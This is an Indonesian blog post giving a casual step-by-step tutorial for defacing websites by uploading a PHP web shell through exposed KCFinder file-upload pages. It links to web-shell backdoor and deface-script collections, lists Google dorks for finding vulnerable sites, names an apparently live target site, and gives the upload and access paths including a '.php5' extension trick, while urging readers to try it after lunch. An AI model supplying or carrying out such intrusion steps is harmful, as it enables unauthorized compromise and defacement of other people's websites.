halo , selamat siang semua ,
sembari makan siang , yuk dibaca , nanti sehabis makan jangan lupa di praktekin ea wwkwk
sekarang mimin mau share gimana cara deface dengan KCFinder Up Shell .
Tools / Alat yang di butuhin ga terlalu ribet kok , dari HP / handphone juga bisa , asal bisa ganti extensi aja hehe
oke yang pertama adalah siapkan shell dan script deface kalian …
- shell bisa download disini > https://depsecurity.or.id/2017/04/09/kumpulan-shell-backdoor-2017/ atau disana > https://www.jakarta-blackhat.ml/search/label/shell
- Script deface ,silakan cek disni > https://www.jakarta-blackhat.ml/search/label/script
DORK
inurl:/kcfinder/browse.php
lib/kcfinder/files/upload
admin/kcfinder/files/upload
panel/kcfinder/upload/files
editor/kcfinder/upload
Kcfinder/upload/files
lib/kcfinder/files/upload
admin/kcfinder/files/upload
panel/kcfinder/upload/files
editor/kcfinder/upload
Kcfinder/upload/files
inurl:/panel/kcfinder/ intext:2017
- Sekarang tinggal dorking di google .
2. Pilih salah satu web , contoh live target ~> https://www.turkuazelektrik.com/
3. Jika tampilan nya menuju ke yang lain masukin
exploit > www.localhost.com/path/kcfinder/ lalu pilih browse.php
dikarenakan di atas gue menggunakan dork /panel/kcfinder/ maka exploit nya
www.localhost/panel/kcfinder/
www.localhost/panel/kcfinder/browse.php *intinya tergantung path .
4.cek gambar dibawah , pilih upload
5.upload shell.php5
6. Jika sudah terupload , silakan akses shell di > localhost/panel/kcfinder/upload/files/shell.php5
Sumber : Jakarta-Blackhat
![[NEWS] Situs Kabupaten Pandeglang Diretas](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRw8akpkI3oRKHMJfWPjKpwA-tt8WHGeSPZQeATMewdujU_mZWZd7-GYJ_xgln7iRlpgbb2ICQ67yxxIk4YtaQGpY8RMU86fsfkww8FoArMHPU0LZIbVA7wvfIFlPZ6y0XEsg77ivMhwg/s72-c/dwqdqqqwd.png)
Hello, Saya Pandu
No comments:
Post a Comment